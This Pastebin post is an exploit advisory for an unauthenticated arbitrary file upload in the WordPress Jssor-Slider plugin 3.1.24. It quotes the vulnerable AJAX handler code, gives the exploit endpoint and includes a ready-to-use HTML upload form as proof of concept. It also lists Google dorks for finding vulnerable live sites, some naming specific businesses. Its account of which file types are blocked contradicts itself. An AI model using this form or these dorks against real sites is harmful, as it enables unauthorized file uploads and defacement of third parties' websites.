Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ##########################################################################
- # Exploit Title : WordPress Jssor-Slider Plugins 3.1.24 CSRF Arbitrary File Upload
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 14/02/2019
- # Vendor Homepage : jssor.com ~ drcsystems.com ~ ethicsolutions.com
- # Software Download Link : downloads.wordpress.org/plugin/jssor-slider.3.1.24.zip
- # Software Information Link : wordpress.org/plugins/jssor-slider/
- # Software Affected Version : 3.1.24 and previous versions
- # Tested On : Windows
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/wp-content/jssor-slider/''
- # Vulnerability Type : CWE-284 [ Improper Access Control ] - CWE-862 [ Missing Authorization ]
- # CXSecurity Reference Link : cxsecurity.com/ascii/WLB-2018060226
- # Cyberizm Reference Link : cyberizm.org/cyberizm-wordpress-drcsystems-ethicsolutions-jssorslider-exploit.html
- ##########################################################################
- # Description About Software :
- ****************************
- Description : “Jssor Slider by jssor.com” is open source software.
- Jssor Slider is professional, light weight and easy to use
- slideshow/slider/gallery/carousel/banner, it is optimized for mobile device with tons of unique features.
- # Key Features :
- Touch Swipe - 200+ Slideshow Transitions - Layer Animation -
- Fast Loading, load slider html code from disk cache directly -
- High Performance Light Weight - Easy to Use - Repeated Layer Animation -
- Image Layer - Text/Html Layer - Panel Layer - Nested Layer -
- Layer Blending - Clip Mask - Multiplex Transition - z-index Animation -
- Timeline Break - Dozens of bullet/arrow/thumbnail skins
- ##########################################################################
- # Google Dorks :
- *********************
- inurl:''/wp-content/jssor-slider/jssor-uploads/''
- intext:''Managed by Web development company Ethic Solutions''
- intext:''Todos los derechos reservados © Ecuaauto - Distribuidor autorizado Chevrolet Ecuador''
- intext:''Website Developed by DRC Systems''
- ##########################################################################
- Vulnerable Source Code :
- ************************
- When the plugin is active the function register_ajax_calls() in the file /lib/jssor-slider-class.php is run:
- That gives anyone access to two AJAX functions that are only intended to be accessible to those logged in as Administrators.
- The upload_library() function accessible through that handles uploading a file through /lib/upload.php.
- That file also doesn’t do any checks as to who is making the request and does not restrict what type of files can be uploaded.
- It is also possible to exploit this by sending a request directly to the file /lib/upload.php, as long as the undefined constant in that isn’t treated as an error.
- The following proof of concept will upload the selected file to the directory /wp-content/jssor-slider/jssor-uploads/.
- Make sure to replace “[path to WordPress]” with the location of WordPress.
- public function register_ajax_calls() {
- if ( isset( $_REQUEST['action'] ) ) {
- switch ( $_REQUEST['action'] ) {
- case 'add_new_slider_library' :
- add_action( 'admin_init', 'jssor_slider_library' );
- function jssor_slider_library() {
- include_once JSSOR_SLIDER_PATH . '/lib/add-new-slider-class.php';
- }
- break;
- case 'upload_library' :
- add_action( 'admin_init', 'upload_library' );
- function upload_library() {
- include_once JSSOR_SLIDER_PATH . '/lib/upload.php';
- }
- break;
- }
- }
- }
- #####################################################################################################
- # Exploit :
- **********
- /wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
- # Error : {"jsonrpc" : "2.0", "result" : null, "id" : "id"}
- # Exploit Code :
- ***************
- <html>
- <body>
- <form action="http://[PATH]/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library" method="POST" enctype="multipart/form-data" >
- <input type="file" name="file" />
- <input type="submit" value="Submit" />
- </form>
- </body>
- </html
- # Uploaded File Path :
- ********************
- /wp-content/jssor-slider/jssor-uploads/.....
- # Allowed File Extensions : With the exception of php and asp. [ Not Allowed ]
- But other files extensions are allowed. For example html and txt and etcetra....
- # Usage : Use with XAMPP Control Panel and with your Localhost [ 127.0.0.1]
- localhost/jssorsliderexploiter.html
- #################################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- #################################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement